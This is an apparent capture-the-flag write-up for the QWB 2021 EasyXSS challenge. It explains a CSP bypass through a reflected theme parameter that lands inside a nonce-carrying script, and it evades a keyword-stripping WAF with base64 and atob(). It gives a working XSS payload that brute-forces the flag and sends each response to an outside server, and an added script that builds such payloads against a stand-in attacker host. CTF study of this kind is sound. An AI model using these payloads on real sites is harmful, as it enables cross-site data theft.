强网杯 (QWB) 2021 EasyXSS Write-up

Bored over the Dragon Boat Festival, so here is a quick challenge.

First, go through every feature. The search and write pages do not filter input, but the site's CSP only allows scripts carrying the right nonce, so injected inline script at those XSS points never executes.

The about page is different: its theme parameter is reflected straight into the script that sets the page title. That script already carries a valid nonce, so anything injected into it is allowed by the CSP. The plan is therefore to break out of the string and modify that script.

Injecting the PoC confirms it: the alert pops.

about?theme=";alert(1);//

Next, write the real payload.

During exploitation parts of the payload went missing for no obvious reason, which points to a WAF. Whatever its exact rules, it strips strings such as the space character, get, split and flag{, so the approach is to carry those literals as base64 and decode them with atob() at runtime.

Final payload. It works as follows: the flag prefix recovered so far and the string GET are base64-encoded and decoded with atob(), the candidate alphabet is written as an array literal instead of calling split, and every + is URL-encoded as %2b so the server does not decode it into a space (which the WAF would strip). For each candidate character the script requests /flag?var=<prefix><char>; when the request succeeds, the response is sent to the attacker's server through window.location, and the error callback discards everything else.

http://localhost:8888/about?theme=";urls="http://www.bertramc.cn:9999/?test=";f=atob("ZmxhZ3s2YmI3N2Y4Yi02YmM4LTRiOWUtYjY1NC04YTRkYTVhZTkyMGQ=");url="/flag?var=";s=["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9","-","}"];$.each(s,function(i,v){tu="";tf="";tf=f%2bv;$.ajax({type:atob("R0VU"),url:url%2btf,success:function(res){window.location=urls%2bres;},error:function(){}});});//
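The following is an added example written for this write-up, not code from the challenge or from the original post. It models the two ideas behind the final payload: keeping every WAF-blocked keyword out of the injected JavaScript (base64 plus atob(), an array literal instead of split, no spaces), and extending a known flag prefix one character at a time through an oracle endpoint. Everything about the server is assumed: the WAF is modelled as stripping blocked substrings case-insensitively, /flag?var= is modelled as succeeding only for a correct prefix, and the flag value is constructed for the demo. The extraction loop generalises the single round in the payload above, which presumably had to be re-run by hand with an updated base64 prefix for every character.

```javascript
// Added example, not code from the challenge or the original post.
// Assumptions: the WAF deletes blocked substrings (case-insensitively), the
// /flag?var= endpoint succeeds only when the candidate is a prefix of the real
// flag, and the flag used at the bottom is made up for the demo.

// Keywords the write-up reports the WAF removing (the first entry is a space).
const BLOCKED = [" ", "get", "split", "flag{"];

// Simulated stripping WAF (assumed behaviour): every blocked keyword is deleted,
// regardless of case, which is why "GET" also has to be hidden.
function waf(input) {
  let out = input;
  for (const kw of BLOCKED) {
    const re = new RegExp(kw.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"), "gi");
    out = out.replace(re, "");
  }
  return out;
}

// btoa/atob equivalents so the file also runs under Node.
const b64enc = (s) => Buffer.from(s, "utf8").toString("base64");
const b64dec = (s) => Buffer.from(s, "base64").toString("utf8");

// Candidate alphabet from the payload: hex digits, "-" and the closing "}".
const ALPHABET = "abcdef0123456789-}".split("");

// Build one round of the injected script the way the final payload does it:
// blocked literals ("GET", the flag prefix) travel as base64 and are decoded
// with atob() at runtime, the alphabet is an array literal, and no spaces
// appear anywhere. The leading `";` closes the string the theme parameter
// lands in; the trailing `//` comments out the rest of the original line.
// When this is placed in a URL, every `+` must be percent-encoded as %2b or
// the server will decode it as a space.
function buildPayload(knownPrefix, attackerUrl) {
  return (
    '";urls="' + attackerUrl + '";' +
    'f=atob("' + b64enc(knownPrefix) + '");' +
    'url="/flag?var=";' +
    's=' + JSON.stringify(ALPHABET) + ';' +
    '$.each(s,function(i,v){$.ajax({type:atob("' + b64enc("GET") + '"),' +
    'url:url+f+v,success:function(res){window.location=urls+res;},' +
    'error:function(){}});});//'
  );
}

// True when the simulated WAF passes the payload through untouched.
function survivesWaf(payload) {
  return waf(payload) === payload;
}

// Simulated oracle standing in for /flag?var=<candidate>: accepts exactly the
// candidates that are prefixes of the real flag (assumed server behaviour).
function makeOracle(secretFlag) {
  return (candidate) => secretFlag.startsWith(candidate);
}

// Extend the known prefix one accepted character at a time until the closing
// "}" is accepted. Returns null when no candidate is accepted, which means the
// starting prefix or the alphabet is wrong.
function extractFlag(oracle, knownPrefix) {
  let prefix = knownPrefix;
  for (;;) {
    const next = ALPHABET.find((c) => oracle(prefix + c));
    if (next === undefined) return null;
    prefix += next;
    if (next === "}") return prefix;
  }
}

// Stand-alone run with a constructed flag and a hypothetical attacker host.
const demoFlag = "flag{6bb7-4b9e}";
console.log(survivesWaf(buildPayload("flag{", "http://attacker.example/?t=")));
console.log(extractFlag(makeOracle(demoFlag), "flag{"));
```

Running b64dec() over the two atob() arguments in the real payload recovers "GET" and the portion of the flag that had been found at that point, which is how the round-by-round nature of the original exploit shows through.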
